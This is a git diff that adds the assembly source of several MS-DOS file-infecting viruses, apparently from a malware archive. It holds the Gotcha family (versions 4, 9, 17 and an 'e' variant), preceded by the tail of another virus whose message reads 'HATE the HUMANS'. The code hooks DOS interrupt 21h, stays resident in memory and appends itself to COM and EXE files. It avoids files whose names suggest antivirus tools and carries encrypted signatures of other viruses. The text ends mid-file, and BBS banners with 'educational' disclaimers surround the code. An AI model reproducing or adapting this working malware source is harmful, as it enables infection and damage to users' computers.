-18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279 + dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179 + dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804 + dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602 + dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793 + dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530 + dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594 + dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790 + dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956 + dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971 + dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757 +gombdata: + DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46 + DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25 + DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21 + DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25 + DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0 + DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2 + DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5 + DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12 + DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30 + DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0 + DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44 + DW 33,15,-33,46,12,-14,48,9,7,40,6,29 + DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29 + DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44 + DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0 + DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30 + DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12 + DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5 + DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2 + DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0 + DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25 + DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21 + DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25 + DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46 + DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0 + DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46 + DW 33,15,-33,44,18,-14,44,21,7,35,24,25 + DW 19,26,37,0,29,40,-17,31,34,-29,34,21 + DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25 + DW 3,43,-23,12,45,-17,16,46,-8,15,47,0 + DW 11,48,5,5,49,7,0,49,6,0,49,2 + DW 0,49,0,2,49,0,6,49,0,7,49,5 + DW 5,48,11,0,47,15,-8,46,16,-17,45,12 + DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30 + DW 5,36,-33,21,34,-29,34,31,-17,40,29,0 + DW 37,26,19,25,24,35,7,21,44,-14,18,44 + DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29 + DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29 + DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44 + DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0 + DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30 + DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12 + DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5 + DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2 + DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0 + DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25 + DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21 + DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25 + DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46 + DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0 +patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27 + db 31,35,40,45,50,56,61,67,73,80,86,93 + + + +mess db 'HARD HIT & HEAVY HATE the HUMANS !!' + db ' [ H.H.& H.H. the H. ] ' +drt dw 5 dup (0) +memory: + CODE ENDS + + END START + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.gotcha-e.asm b/MSDOS/Virus.MSDOS.Unknown.gotcha-e.asm new file mode 100644 index 00000000..f244dfbc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gotcha-e.asm @@ -0,0 +1,397 @@ +;**************************************************************************** +;* stripped COM-versie +;* met signature's +;* +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +SIGNLEN equ signend - signature +FILELEN equ eind - begin +RESPAR equ (FILELEN/16) + 17 +BUFLEN equ 08h +VERSION equ 4 + + .RADIX 16 + + +;**************************************************************************** +;* Opstart programma +;**************************************************************************** + +begin: xor bx,bx + mov cl,07h +crloop: call crypt + loop crloop + call install + int 20 + + +;**************************************************************************** +;* Data +;**************************************************************************** + +buffer db BUFLEN dup (?) +oi21 dw ?,? +oldlen dw ? +handle dw ? +sign db 0 + + +;**************************************************************************** +;* Interupt handler 21 +;**************************************************************************** + +ni21: pushf + + cmp ax,4B00h + jne ni_verder + + push es + push ds + push ax + push bx + push cx + push dx + + call attach + + mov cl,[sign] + call crypt + inc cl + and cl,07h + mov [sign],cl + call crypt + + pop dx + pop cx + pop bx + pop ax + pop ds + pop es + +exit: popf + jmp dword ptr cs:[oi21] ;naar oude int-handler + +ni_verder: cmp ax,0DADAh + jne exit + mov ax,0A500h+VERSION + popf + iret + + +;**************************************************************************** +;* plakt programma aan file (ASCIIZ DS:DX) +;**************************************************************************** + +attach: cld + + mov ax,3D02h ;open de file + int 21 + jc finnish + + push cs + pop ds + mov [handle],ax ;bewaar file-handle + + call eindptr ;bepaal lengte + jc finnish + mov [oldlen],ax + + sub ax,SIGNLEN ;pointer naar eind - SIGNLEN + sbb dx,0 + mov cx,dx + mov dx,ax + mov al,00h + call ptrmov + jc finnish + + mov cx,SIGNLEN ;lees de laatse bytes + mov dx,offset buffer + call flread + jc finnish + +verder3: push cs ;vergelijk signature met buffer + pop es + mov di,offset buffer + mov si,offset signature + mov cx,SIGNLEN + rep cmpsb + or cx,cx + jz finnish + + call beginptr ;lees begin van file + mov cx,BUFLEN + mov dx,offset buffer + call flread + jc finnish + + cmp word ptr [buffer],5A4Dh + jz finnish + + call writeprog ;schrijf programma naar file + jc finnish + + mov ax,[oldlen] ;bereken call-adres + add ax,offset entry + sub ax,0103 + mov byte ptr [buffer],0E9h + mov word ptr [buffer+1],ax + + call beginptr ;pas begin van file aan + mov cx,BUFLEN + mov dx,offset buffer + call flwrite + jc finnish + +finnish: mov bx,[handle] ;sluit de file + mov ah,3Eh + int 21 + + ret + + +;**************************************************************************** +;* Crypt een signature +;**************************************************************************** + +crypt: push cx + mov al,14h + mul cl + add ax,offset virsig + mov si,ax + mov di,ax + push cs + push cs + pop ds + pop es + mov cx,0Ah +cryploop: lodsw + xor ax,0FFFFh + stosw + loop cryploop + pop cx + ret + + +;**************************************************************************** +;* Schrijf programma naar file +;**************************************************************************** + +writeprog: call eindptr + mov cx,FILELEN + mov dx,offset begin + call flwrite + ret + + +;**************************************************************************** +;* Subroutines voor file-pointer +;**************************************************************************** + +beginptr: mov al,00h ;naar begin van de file + xor cx,cx + xor dx,dx + jmp ptrmov + +eindptr: mov al,02h ;naar eind van de file + xor cx,cx + xor dx,dx +; jmp ptrmov + +ptrmov: mov ah,42h + mov bx,[handle] + int 21 + ret + + +;**************************************************************************** +;* Subroutines voor lezen/schrijven +;**************************************************************************** + +flwrite: push cs + pop ds + mov ah,40h + mov bx,[handle] + int 21 + ret + + +flread: push cs + pop ds + mov ah,3Fh + mov bx,[handle] + int 21 + ret + + +;**************************************************************************** +;* Activering vanuit file +;**************************************************************************** + +entry: call entry2 +entry2: pop bx + sub bx,offset entry2 ;CS:BX is begin programma - 100 + + cld + + mov ax,bx ;copieer oude begin terug + add ax,offset buffer + mov si,ax + mov di,0100 + mov cx,BUFLEN + rep movsb + + mov ax,0100h + push ax + +entcall: mov ax,0DADAh ;kijk of al geinstalleerd + int 21h + cmp ah,0A5h + je entstop + + call install ;installeer het programma + +entstop: ret + + +;**************************************************************************** +;* Installatie in het geheugen +;**************************************************************************** + +install: push ds + push es + + xor ax,ax ;haal oude vector + mov es,ax + mov cx,word ptr es:0084h + mov dx,word ptr es:0086h + mov [bx+offset oi21],cx + mov [bx+offset oi21+2],dx + + mov ax,ds ;pas geheugen-grootte aan + dec ax + mov es,ax + cmp byte ptr es:[0000h],5Ah + jnz cancel + mov ax,es:[0003h] + sub ax,RESPAR + jb cancel + mov es:[0003h],ax + sub es:[0012h], word ptr RESPAR + + mov es,es:[0012h] ;copieer programma naar top + mov ax,bx + add ax,0100 + mov si,ax + mov di,0100h + mov cx,FILELEN + rep movsb + + mov dx,offset ni21 ;zet nieuwe vector + push es + pop ds + mov ax,2521h + int 21h + +cancel: pop es + pop ds + + ret + + +;**************************************************************************** +;* Tekst en Signature +;**************************************************************************** + +virsig: +;SYSLOCK Virus + db 0D1h, 0E9h, 8Ah, 0E1h + db 8Ah, 0C1h, 33h, 06h + db 14h, 00h, 31h, 04h + db 46h, 46h, 0E2h, 0F2h + db 5Eh, 59h, 58h, 0C3h +;Sylvia Virus + db 8Dh, 36h, 03h, 01h + db 33h, 0C9h, 33h, 0C0h + db 0ACh, 3Ch, 1Ah, 74h + db 04h, 90h, 90h, 90h + db 90h, 90h, 90h, 90h +;DATACRIME IIb Virus + db 2Eh, 8Ah, 07h, 32h + db 0C2h, 0D0h, 0CAh, 2Eh + db 88h, 07h, 43h, 0E2h + db 0F3h, 90h, 90h, 90h + db 90h, 90h, 90h, 90h +;Yankee-Go-Home Virus (Enigma) + db 0D8h, 0Eh, 1Fh, 0BEh + db 37h, 08h, 81h, 0EEh + db 03h, 01h, 03h, 0F3h + db 89h, 04h, 0BEh, 39h + db 08h, 81h, 0EEh, 03h +;Slowdown Virus + db 0DEh, 90h, 90h, 81h + db 0C6h, 1Bh, 00h, 0B9h + db 90h, 06h, 2Eh, 80h + db 34h, 90h, 90h, 90h + db 90h, 90h, 90h, 90h +;Scotts Valley Virus + db 5Eh, 8Bh, 0DEh, 90h + db 90h, 81h, 0C6h, 32h + db 00h, 0B9h, 12h, 08h + db 2Eh, 90h, 90h, 90h + db 90h, 90h, 90h, 90h +;Tiny-2A related Virus + db 0A5h, 8Eh, 0C1h, 0A6h + db 74h, 12h, 4Eh, 4Fh + db 0F3h, 0A5h, 8Eh, 0C1h + db 93h, 91h, 91h, 26h + db 87h, 85h, 0E0h, 0FEh +;DATACRIME 1280 Virus + db 8Bh, 36h, 01h, 01h + db 83h, 0EEh, 03h, 8Bh + db 0C6h, 3Dh, 00h, 00h + db 75h, 03h, 0E9h, 02h + db 01h, 90h, 90h, 90h + + +;;July13 Virus +; db 0A0h, 12h, 00h, 34h +; db 90h, 0BEh, 12h, 00h +; db 0B9h, 0B1h, 04h, 2Eh +; db 30h, 04h, 46h, 0E2h +; db 0FAh, 90h, 90h, 90h +;;XA1 Virus (Tannenbaum) +;virsig: db 0FAh, 8Bh, 0ECh, 58h +; db 32h, 0C0h, 89h, 46h +; db 02h, 81h, 46h, 00h +; db 28h, 00h, 90h, 90h +; db 90h, 90h, 90h, 90h +;;Twelve Tricks Trojan Dropper +; db 0BEh, 64h, 02h, 31h +; db 94h, 42h, 01h, 0D1h +; db 0C2h, 4Eh, 79h, 0F7h +; db 90h, 90h, 90h, 90h +; db 90h, 90h, 90h, 90h + + + +signature: db 'GOTCHA!',0 +signend: + +eind: + +cseg ends + end begin + + + + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.gotcha17.asm b/MSDOS/Virus.MSDOS.Unknown.gotcha17.asm new file mode 100644 index 00000000..57eb845b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gotcha17.asm @@ -0,0 +1,503 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;**************************************************************************** +;* Gotcha version 17 +;* +;* Compile with MASM 4.0 +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;**************************************************************************** + + .RADIX 16 + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + +VERSION equ 17d +FILELEN equ end - start +RESPAR equ (FILELEN/16d) + 18d +BUFLEN equ 18 +ENVLEN equ signature- envstring +COMSIGN equ 0 +EXESIGN equ 1 + + +;**************************************************************************** +;* Dummy program (infected) +;**************************************************************************** + + org 0100 + +begin: db 0E9, BUFLEN+1, 0 ;jump to virus entry + + +;**************************************************************************** +;* Data +;**************************************************************************** + + org 0103 + +start: +buffer db 0CDh, 20 ;original code + db (BUFLEN-2) dup (?) +comexe db COMSIGN ;dummy program is a COM program + + +;**************************************************************************** +;* Install the virus +;**************************************************************************** + + call start2 +start2: pop si + sub si,(BUFLEN+4) ;si = begin virus + mov di,0100 + cld + + cmp byte ptr cs:[si+BUFLEN],COMSIGN + jz entryC + +entryE: mov ax,ds ;calculate CS + add ax,10 + add ax,cs:[si+16] + push ax ;push new CS on stack + push cs:[si+14] ;push new IP on stack + jmp short entcheck + +entryC: push cs ;push new CS on stack + push di ;push new IP on stack + push di + push si + movsw ;restore old file-begin + movsb + pop si + pop di + +entcheck: mov ax,0DADA ;already installed? + int 21 + cmp ah,0A5 + je entstop + + mov ax,3000 ;test DOS version >= 3.1? + int 21 + xchg ah,al + cmp ax,030A + jb entstop + + push ds + push es + + mov ax,ds ;adjust memory-size + dec ax + mov ds,ax + cmp byte ptr ds:[0000],5A + jnz cancel + mov ax,ds:[0003] + sub ax,low RESPAR + jb cancel + mov ds:[0003],ax + sub word ptr ds:[0012],low RESPAR + + mov es,ds:[0012] ;copy program to top + push cs + pop ds + mov cx,FILELEN + rep movsb + + mov ds,cx ;get original int21 vector + mov si,4*21 + movsw ;move it to the end + movsw + + push es ;set vector to new handler + pop ds + mov dx,offset ni21-3 + mov ax,2521 + int 21 + +cancel: pop es + pop ds + +entstop: db 0CBh ;retf + + +;**************************************************************************** +;* Interupt 24 handler +;**************************************************************************** + +ni24: mov al,3 + iret + + +;**************************************************************************** +;* Interupt 21 handler +;**************************************************************************** + +ni21: pushf + + cmp ax,0DADA ;install-check ? + je do_DADA + + push dx + push cx + push bx + push ax + push si + push di + push ds + push es + + cmp ah,3E ;close ? + jne vvv + mov ah,45 ;duplicate handle + jmp short doit + +vvv: cmp ax,4B00 ;execute ? + jne exit + mov ah,3Dh ;open the file + +doit: int 21 + jc exit + xchg ax,bx + call infect + +exit: pop es + pop ds + pop di + pop si + pop ax + pop bx + pop cx + pop dx + popf + +org21: jmp dword ptr cs:[oi21-3] ;call to old int-handler + + +do_DADA: mov ax,0A500+VERSION ;return a signature + popf + iret + + +;**************************************************************************** +;* Close the file +;**************************************************************************** + +close: mov ah,3E ;close the file + pushf + push cs + call org21 + ret + + +;**************************************************************************** +;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) +;**************************************************************************** + +infect: cld + + push bx + mov ah,62 ;get segment-adres of PSP + int 21 + mov ds,bx ;get seg-adres of environment + mov es,ds:[002C] + xor di,di + pop bx + push cs + pop ds + +envloop: mov si,offset envstring-3 ;check the environment + mov cx,ENVLEN + repz cmpsb + jz close ;exit if item found + dec di ;goto next item + xor al,al + mov ch,0FF + repnz scasb + cmp byte ptr es:[di],0 ;finnished environment? + jnz envloop + + mov ax,3300 ;get ctrl-break flag + int 21 + push dx + + cwd ;clear the flag + inc ax + push ax + int 21 + + mov dx,bx + mov ax,3524 ;get int24 vector + int 21 + push bx + push es + mov bx,dx + + push cs + pop ds + + mov dx,offset ni24 ;set int24 vector + mov ah,25 + push ax + int 21 + + mov ax,1220 ;get file-table entry + push bx + push ax + int 2F + mov bl,es:[di] + pop ax + sub al,0A + int 2F + pop bx + + push es + pop ds + + push [di+2] ;save attribute & open-mode + push [di+4] + + cmp word ptr [di+28],'XE' ;check extension + jne not_exe + cmp byte ptr [di+2A],'E' + jmp short check + +not_exe: cmp word ptr [di+28],'OC' + jne close1v + cmp byte ptr [di+2A],'M' +check: je check_name +close1v: jmp close1 + +check_name: cmp byte ptr [di+20],'V' ;name is V*.* ? + je close1v + cmp byte ptr [di+20],'F' ;name is F*.* ? + je close1v + + mov cx,7 ;name is *SC*.* ? + mov ax,'CS' + push di + add di,21 +SCloop: dec di + scasw + loopnz SCloop + pop di + je close1v + + mov byte ptr [di+2],2 ;open for read/write + mov byte ptr [di+4],0 ;clear attributes + call getlen + mov cl,3 + sub ax,cx ;goto signature + sbb dx,0 + call goto + push ax ;save old offset + push dx + + push cs + pop ds + + mov si,0100 ;read signature + mov dx,si + mov ah,3F + int 21 + + cmp word ptr [si],'!A' ;already infected? + je close2v + + call gotobegin + + mov cl,BUFLEN ;read begin + mov dx,si + mov ah,3F + int 21 + + cmp word ptr [si],5A4Dh ;EXE ? + jz do_EXE + cmp word ptr [si],4D5A + jz do_EXE + +do_COM: mov byte ptr [si+BUFLEN],COMSIGN + + cmp byte ptr es:[di+12],0FC ;check length + jnb close2 + cmp byte ptr es:[di+12],3 + jbe close2 + + call writeprog ;write program to end of file + jnz close2 + + mov byte ptr [si],0E9h ;JMP xxxx' + call getoldlen + add ax,(BUFLEN-2) + mov word ptr [si+1],ax + + jmp short done +close2v: jmp short close2 + +do_EXE: mov byte ptr [si+BUFLEN],EXESIGN + + call writeprog ;write program to end of file + jnz close2 + + call getlen ;calculate new length + mov cx,0200 ;put new length in header + div cx + inc ax + mov word ptr [si+4],ax + mov word ptr [si+2],dx + + call getoldlen ;calculate new CS & IP + mov cx,0010 + div cx + sub ax,word ptr [si+8] + mov word ptr [si+16],ax ;put CS in header + add dx,BUFLEN+1 + mov word ptr [si+14],dx ;put IP in header + + +done: call gotobegin + mov cx,BUFLEN ;write new begin + mov dx,si + mov ah,40 + int 21 + +close2: push es + pop ds + + pop dx ;restore old offset in file + pop ax + call goto + + or byte ptr [di+6],40 ;no time-change + +close1: call close + + or byte ptr [di+5],40 ;no EOF on next close + pop [di+4] ;restore attribute & open-mode + pop [di+2] + + pop ax ;restore int24 vector + pop ds + pop dx + int 21 + + pop ax ;restore ctrl-break flag + pop dx + int 21 + + ret + + +;**************************************************************************** +;* Get original length of program +;**************************************************************************** + +getoldlen: call getlen + sub ax,FILELEN + sbb dx,0 + ret + + +;**************************************************************************** +;* Get length of program +;**************************************************************************** + +getlen: mov ax,es:[di+11] + mov dx,es:[di+13] + ret + + +;**************************************************************************** +;* Goto new offset DX:AX +;**************************************************************************** + +gotobegin: xor ax,ax + cwd +goto: xchg ax,es:[di+15] + xchg dx,es:[di+17] + ret + + +;**************************************************************************** +;* Write virus to the file +;**************************************************************************** + +writeprog: call getlen + call goto + + mov cx,FILELEN ;write virus + mov dx,si + mov ah,40 + int 21 + cmp cx,ax ;are all bytes written? + ret + + +;**************************************************************************** +;* Text and Signature +;**************************************************************************** + +envstring db 'E=mc',0 + +signature: db 'GOTCHA!',0 ;I have got you! :-) + +oi21: +end: + +cseg ends + end begin + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.gotcha4.asm b/MSDOS/Virus.MSDOS.Unknown.gotcha4.asm new file mode 100644 index 00000000..f244dfbc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gotcha4.asm @@ -0,0 +1,397 @@ +;**************************************************************************** +;* stripped COM-versie +;* met signature's +;* +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +SIGNLEN equ signend - signature +FILELEN equ eind - begin +RESPAR equ (FILELEN/16) + 17 +BUFLEN equ 08h +VERSION equ 4 + + .RADIX 16 + + +;**************************************************************************** +;* Opstart programma +;**************************************************************************** + +begin: xor bx,bx + mov cl,07h +crloop: call crypt + loop crloop + call install + int 20 + + +;**************************************************************************** +;* Data +;**************************************************************************** + +buffer db BUFLEN dup (?) +oi21 dw ?,? +oldlen dw ? +handle dw ? +sign db 0 + + +;**************************************************************************** +;* Interupt handler 21 +;**************************************************************************** + +ni21: pushf + + cmp ax,4B00h + jne ni_verder + + push es + push ds + push ax + push bx + push cx + push dx + + call attach + + mov cl,[sign] + call crypt + inc cl + and cl,07h + mov [sign],cl + call crypt + + pop dx + pop cx + pop bx + pop ax + pop ds + pop es + +exit: popf + jmp dword ptr cs:[oi21] ;naar oude int-handler + +ni_verder: cmp ax,0DADAh + jne exit + mov ax,0A500h+VERSION + popf + iret + + +;**************************************************************************** +;* plakt programma aan file (ASCIIZ DS:DX) +;**************************************************************************** + +attach: cld + + mov ax,3D02h ;open de file + int 21 + jc finnish + + push cs + pop ds + mov [handle],ax ;bewaar file-handle + + call eindptr ;bepaal lengte + jc finnish + mov [oldlen],ax + + sub ax,SIGNLEN ;pointer naar eind - SIGNLEN + sbb dx,0 + mov cx,dx + mov dx,ax + mov al,00h + call ptrmov + jc finnish + + mov cx,SIGNLEN ;lees de laatse bytes + mov dx,offset buffer + call flread + jc finnish + +verder3: push cs ;vergelijk signature met buffer + pop es + mov di,offset buffer + mov si,offset signature + mov cx,SIGNLEN + rep cmpsb + or cx,cx + jz finnish + + call beginptr ;lees begin van file + mov cx,BUFLEN + mov dx,offset buffer + call flread + jc finnish + + cmp word ptr [buffer],5A4Dh + jz finnish + + call writeprog ;schrijf programma naar file + jc finnish + + mov ax,[oldlen] ;bereken call-adres + add ax,offset entry + sub ax,0103 + mov byte ptr [buffer],0E9h + mov word ptr [buffer+1],ax + + call beginptr ;pas begin van file aan + mov cx,BUFLEN + mov dx,offset buffer + call flwrite + jc finnish + +finnish: mov bx,[handle] ;sluit de file + mov ah,3Eh + int 21 + + ret + + +;**************************************************************************** +;* Crypt een signature +;**************************************************************************** + +crypt: push cx + mov al,14h + mul cl + add ax,offset virsig + mov si,ax + mov di,ax + push cs + push cs + pop ds + pop es + mov cx,0Ah +cryploop: lodsw + xor ax,0FFFFh + stosw + loop cryploop + pop cx + ret + + +;**************************************************************************** +;* Schrijf programma naar file +;**************************************************************************** + +writeprog: call eindptr + mov cx,FILELEN + mov dx,offset begin + call flwrite + ret + + +;**************************************************************************** +;* Subroutines voor file-pointer +;**************************************************************************** + +beginptr: mov al,00h ;naar begin van de file + xor cx,cx + xor dx,dx + jmp ptrmov + +eindptr: mov al,02h ;naar eind van de file + xor cx,cx + xor dx,dx +; jmp ptrmov + +ptrmov: mov ah,42h + mov bx,[handle] + int 21 + ret + + +;**************************************************************************** +;* Subroutines voor lezen/schrijven +;**************************************************************************** + +flwrite: push cs + pop ds + mov ah,40h + mov bx,[handle] + int 21 + ret + + +flread: push cs + pop ds + mov ah,3Fh + mov bx,[handle] + int 21 + ret + + +;**************************************************************************** +;* Activering vanuit file +;**************************************************************************** + +entry: call entry2 +entry2: pop bx + sub bx,offset entry2 ;CS:BX is begin programma - 100 + + cld + + mov ax,bx ;copieer oude begin terug + add ax,offset buffer + mov si,ax + mov di,0100 + mov cx,BUFLEN + rep movsb + + mov ax,0100h + push ax + +entcall: mov ax,0DADAh ;kijk of al geinstalleerd + int 21h + cmp ah,0A5h + je entstop + + call install ;installeer het programma + +entstop: ret + + +;**************************************************************************** +;* Installatie in het geheugen +;**************************************************************************** + +install: push ds + push es + + xor ax,ax ;haal oude vector + mov es,ax + mov cx,word ptr es:0084h + mov dx,word ptr es:0086h + mov [bx+offset oi21],cx + mov [bx+offset oi21+2],dx + + mov ax,ds ;pas geheugen-grootte aan + dec ax + mov es,ax + cmp byte ptr es:[0000h],5Ah + jnz cancel + mov ax,es:[0003h] + sub ax,RESPAR + jb cancel + mov es:[0003h],ax + sub es:[0012h], word ptr RESPAR + + mov es,es:[0012h] ;copieer programma naar top + mov ax,bx + add ax,0100 + mov si,ax + mov di,0100h + mov cx,FILELEN + rep movsb + + mov dx,offset ni21 ;zet nieuwe vector + push es + pop ds + mov ax,2521h + int 21h + +cancel: pop es + pop ds + + ret + + +;**************************************************************************** +;* Tekst en Signature +;**************************************************************************** + +virsig: +;SYSLOCK Virus + db 0D1h, 0E9h, 8Ah, 0E1h + db 8Ah, 0C1h, 33h, 06h + db 14h, 00h, 31h, 04h + db 46h, 46h, 0E2h, 0F2h + db 5Eh, 59h, 58h, 0C3h +;Sylvia Virus + db 8Dh, 36h, 03h, 01h + db 33h, 0C9h, 33h, 0C0h + db 0ACh, 3Ch, 1Ah, 74h + db 04h, 90h, 90h, 90h + db 90h, 90h, 90h, 90h +;DATACRIME IIb Virus + db 2Eh, 8Ah, 07h, 32h + db 0C2h, 0D0h, 0CAh, 2Eh + db 88h, 07h, 43h, 0E2h + db 0F3h, 90h, 90h, 90h + db 90h, 90h, 90h, 90h +;Yankee-Go-Home Virus (Enigma) + db 0D8h, 0Eh, 1Fh, 0BEh + db 37h, 08h, 81h, 0EEh + db 03h, 01h, 03h, 0F3h + db 89h, 04h, 0BEh, 39h + db 08h, 81h, 0EEh, 03h +;Slowdown Virus + db 0DEh, 90h, 90h, 81h + db 0C6h, 1Bh, 00h, 0B9h + db 90h, 06h, 2Eh, 80h + db 34h, 90h, 90h, 90h + db 90h, 90h, 90h, 90h +;Scotts Valley Virus + db 5Eh, 8Bh, 0DEh, 90h + db 90h, 81h, 0C6h, 32h + db 00h, 0B9h, 12h, 08h + db 2Eh, 90h, 90h, 90h + db 90h, 90h, 90h, 90h +;Tiny-2A related Virus + db 0A5h, 8Eh, 0C1h, 0A6h + db 74h, 12h, 4Eh, 4Fh + db 0F3h, 0A5h, 8Eh, 0C1h + db 93h, 91h, 91h, 26h + db 87h, 85h, 0E0h, 0FEh +;DATACRIME 1280 Virus + db 8Bh, 36h, 01h, 01h + db 83h, 0EEh, 03h, 8Bh + db 0C6h, 3Dh, 00h, 00h + db 75h, 03h, 0E9h, 02h + db 01h, 90h, 90h, 90h + + +;;July13 Virus +; db 0A0h, 12h, 00h, 34h +; db 90h, 0BEh, 12h, 00h +; db 0B9h, 0B1h, 04h, 2Eh +; db 30h, 04h, 46h, 0E2h +; db 0FAh, 90h, 90h, 90h +;;XA1 Virus (Tannenbaum) +;virsig: db 0FAh, 8Bh, 0ECh, 58h +; db 32h, 0C0h, 89h, 46h +; db 02h, 81h, 46h, 00h +; db 28h, 00h, 90h, 90h +; db 90h, 90h, 90h, 90h +;;Twelve Tricks Trojan Dropper +; db 0BEh, 64h, 02h, 31h +; db 94h, 42h, 01h, 0D1h +; db 0C2h, 4Eh, 79h, 0F7h +; db 90h, 90h, 90h, 90h +; db 90h, 90h, 90h, 90h + + + +signature: db 'GOTCHA!',0 +signend: + +eind: + +cseg ends + end begin + + + + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.gotcha9.asm b/MSDOS/Virus.MSDOS.Unknown.gotcha9.asm new file mode 100644 index 00000000..a664fc56 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.gotcha9.asm @@ -0,0 +1,576 @@ +;**************************************************************************** +;* GOTCHA! Version 9e +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + org 100h + +SIGNLEN equ signend - signature +FILELEN equ end - begin +RESPAR equ (FILELEN/16) + 17 +VERSION equ 9 +BUFLEN equ 